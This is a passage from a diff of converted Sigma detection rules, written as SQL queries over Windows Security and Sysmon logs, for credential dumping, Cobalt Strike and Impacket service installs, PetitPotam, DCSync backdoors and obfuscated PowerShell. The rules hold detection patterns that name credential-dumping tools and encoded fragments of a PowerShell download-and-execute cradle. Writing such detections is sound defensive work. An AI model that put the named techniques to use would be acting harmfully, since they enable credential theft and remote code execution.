* FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" ], - "filename": "file_event_win_lsass_dump.yml" + "filename": "win_security_susp_local_anon_logon_created.yml" }, { - "title": "Cred Dump Tools Dropped Files", - "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", + "title": "Credential Dumping Tools Service Execution - Security", + "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", "status": "test", - "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.credential_access", + "attack.execution", "attack.t1003.001", "attack.t1003.002", - "attack.t1003.003", "attack.t1003.004", - "attack.t1003.005" + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Legitimate Administrator using credential dumping tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "file_event_win_cred_dump_tools_dropped_files.yml" + "filename": "win_security_mal_creddumper.yml" }, { - "title": "CVE-2021-26858 Exchange Exploitation", - "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", + "title": "CobaltStrike Service Installations - Security", + "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", "status": "test", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", - "author": "Bhabesh Raj", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.t1203", "attack.execution", - "cve.2021.26858" + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2021_26858_msexchange.yml" + "filename": "win_security_cobaltstrike_service_installs.yml" }, { - "title": "BloodHound Collection Files", - "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", + "title": "Invoke-Obfuscation Via Stdin - Security", + "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", "status": "experimental", - "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", - "author": "C.J. May", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -23906,205 +23357,226 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\_BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') OR (TargetFilename LIKE '%BloodHound%' ESCAPE '\\' AND TargetFilename LIKE '%.zip%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" ], - "filename": "file_event_win_bloodhound_collection.yml" + "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" }, { - "title": "Octopus Scanner Malware", - "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "title": "Protected Storage Service Access", + "id": "45545954-4016-43c6-855e-eae8f1c369dc", "status": "test", - "description": "Detects Octopus Scanner Malware.", - "author": "NVISO", + "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.t1195", - "attack.t1195.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" ], - "filename": "file_event_win_mal_octopus_scanner.yml" + "filename": "win_security_protected_storage_service_access.yml" }, { - "title": "Suspicious File Created Via OneNote Application", - "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", + "title": "AD Privileged Users or Groups Reconnaissance", + "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", "status": "experimental", - "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", - "Occasional FPs might occur if OneNote is used internally to share different embedded documents" + "If source account name is not an admin then its super suspicious" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_office_onenote_susp_dropped_files.yml" + "filename": "win_security_account_discovery.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", - "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", - "status": "test", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S", + "title": "Possible Impacket SecretDump Remote Activity", + "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", + "status": "experimental", + "description": "Detect AD credential dumping using impacket secretdump HKTL", + "author": "Samir Bousseaden, wagga", "tags": [ "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" ], - "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "win_security_impacket_secretdump.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - File", - "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", + "title": "Metasploit SMB Authentication", + "id": "72124974-a68b-4366-b990-d30e0b2a190d", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Alerts on Metasploit host's authentications on the domain.", + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Linux hostnames composed of 16 characters." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" ], - "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "win_security_metasploit_authentication.yml" }, { - "title": "Unusual File Modification by dns.exe", - "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "title": "Possible Shadow Credentials Added", + "id": "f598ea0c-c25a-4f72-a219-50c44411c791", "status": "experimental", - "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "description": "Detects possible addition of shadow credentials to an active directory object.", + "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.credential_access", + "attack.t1556" ], "falsepositives": [ - "Unknown" + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" ], - "filename": "file_change_win_unusual_modification_by_dns_exe.yml" + "filename": "win_security_susp_possible_shadow_credentials_added.yml" }, { - "title": "File Creation Date Changed to Another Year", - "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", + "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", + "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", "status": "experimental", - "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.t1070.006", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Changes made to or by the local NTP service" + "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((Image LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" ], - "filename": "file_change_win_2022_timestomping.yml" + "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" }, { - "title": "Potential PrintNightmare Exploitation Attempt", - "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "title": "Possible PetitPotam Coerce Authentication Attempt", + "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", "status": "experimental", - "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", - "author": "Bhabesh Raj", + "description": "Detect PetitPotam coerced authentication activity.", + "author": "Mauricio Velazco, Michael Haag", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.credential_access", + "attack.t1187" ], "falsepositives": [ - "Unknown" + "Unknown. Feedback welcomed." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" ], - "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" + "filename": "win_security_petitpotam_network_share.yml" }, { - "title": "Unusual File Deletion by Dns.exe", - "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "title": "Suspicious Scheduled Task Update", + "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", "status": "experimental", - "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "description": "Detects update to a scheduled task event that contain suspicious keywords.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" + "filename": "win_security_susp_scheduled_task_update.yml" }, { - "title": "Prefetch File Deleted", - "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", - "status": "experimental", - "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", - "author": "Cedric MAURUGEON", + "title": "Windows Defender Exclusion Set", + "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "status": "test", + "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", + "author": "@BarryShooshooga", "tags": [ "attack.defense_evasion", - "attack.t1070.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Intended inclusions by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_prefetch.yml" + "filename": "win_security_defender_bypass.yml" }, { - "title": "Exchange PowerShell Cmdlet History Deleted", - "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", + "id": "2c99737c-585d-4431-b61a-c911d86ff32f", "status": "experimental", - "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", + "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "falsepositives": [ + "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + ], + "filename": "win_security_account_backdoor_dcsync_rights.yml" + }, + { + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", + "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Possible FP during log rotation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE 